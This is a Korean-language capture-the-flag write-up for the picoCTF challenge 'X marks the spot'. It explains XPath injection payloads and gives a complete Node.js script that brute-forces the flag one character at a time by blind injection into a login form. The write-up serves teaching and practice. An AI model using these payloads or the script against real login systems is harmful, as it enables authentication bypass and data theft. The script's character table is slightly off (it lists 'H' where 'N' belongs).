[picoCTF] X marks the spot

1. 개요

xpath injection, blind sql injection

 

2. 분석

SQL Injection 과 유사하기 때문에 ' or 'a' ='a 을 입력하면, You're on the right path 라고 메시지가 표시됩니다.

다만, XPATH라는 힌트가 주어졌고, ' or //*[starts-with(text(),'picoCTF{')] or '1'=' 과 같이 XPATH 함수를 적용할 수 있고, 메시지에 표시되는 right path 여부를 통해 flag를 brute force를 맞추는 blind sql injection이 가능합니다.

 

3. 코드

const axios = require('axios')

let isFindFlag = false
let flag = "picoCTF{"
const table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMHOPQRSTUVWXYZ{}!_-"


const checkCharacterIsPartOfFlag = async (character) => {
    const targetUrl = "http://mercury.picoctf.net:28065/"

    const name = "admin"
    const pass = `' or //*[starts-with(text(),'${flag}${character}')] or '1'='`

    const headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    };

    const data = {
        name: name,
        pass: pass
    }

    try {
        const responseHtml = await axios.post(targetUrl, data, { headers })
        return responseHtml?.data?.includes("re on the right path.")
    } catch (err) {
        return false
    }
}

const updateFlag = (character) => {
    flag = `${flag}${character}`
}

const printFlag = () => {
    console.log(flag)
}

const isEndOfFlag = (character) => {
    return character === '}'
}


const main = async () => {
    while (!isFindFlag) {
        for (const ascii of table) {
            const result = await checkCharacterIsPartOfFlag(ascii)
            if (!result) {
                continue
            }

            updateFlag(ascii)
            printFlag()

            if (isEndOfFlag(ascii)) {
                isFindFlag = true
                break
            }
        }
    }
}

main()